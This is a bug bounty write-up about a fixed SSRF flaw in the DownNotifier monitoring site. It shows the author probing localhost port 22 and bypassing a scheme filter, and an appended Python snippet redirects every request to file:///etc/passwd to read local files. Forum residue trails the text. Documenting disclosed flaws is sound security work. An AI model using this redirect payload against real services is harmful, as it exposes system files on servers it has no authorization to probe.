DownNotifier is an online tool to monitor website downtime. It sends an alert to the registered email and SMS when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look at https://www.downnotifier.com. When I browsed the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.

Getting XSPA

The first thing to do is add http://127.0.0.1:22 in the "Website URL" field, select "When the site does not contain a specific text" and write some random text. I sent that request, and two emails arrived in my mailbox a few minutes later: the first to alert that a website is being monitored, and the second to alert that the website is down, but with the response inside an HTML file. And what is the response...?

Getting Local File Read

I was excited, but that is not enough to fetch very sensitive data, so I tried the same process with some URI schemes such as file, ldap, gopher, ftp and ssh, but it did not work. While thinking about how to bypass that filter, I remembered a write-up mentioning a bypass using a redirect with the Location header in a PHP file hosted on your own domain. I hosted a PHP file with the above code and repeated the process, registering a website to monitor. A few minutes later an email arrived in my mailbox with an HTML file. And the response was...

I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support team, because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter whose write-up described the redirect technique with the Location header.
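The redirect trick mentioned above can be sketched as follows. This is an assumption on my part, since the original PHP snippet is not reproduced here: a tiny server on the attacker's own domain that answers every probe with a redirect to a file:// URL, which the monitor's HTTP client then follows. A Python stand-in for the PHP file:

```python
# Hypothetical stand-in for the attacker's PHP redirect file: every GET is
# answered with a 302 pointing at a file:// URL. Host this on a domain you
# control and register that URL as the "Website URL" to monitor.
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToFile(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", "file:///etc/passwd")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectToFile).serve_forever()
```

The outer HTTP URL passes the scheme filter; only the internal fetcher, after following the redirect, ever sees the file:// scheme.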
Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884
Source: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
    1 point
  10. https://scholarslearn.com/2019/09/19/massive-list-of-resources-for-students-developers/
    1 point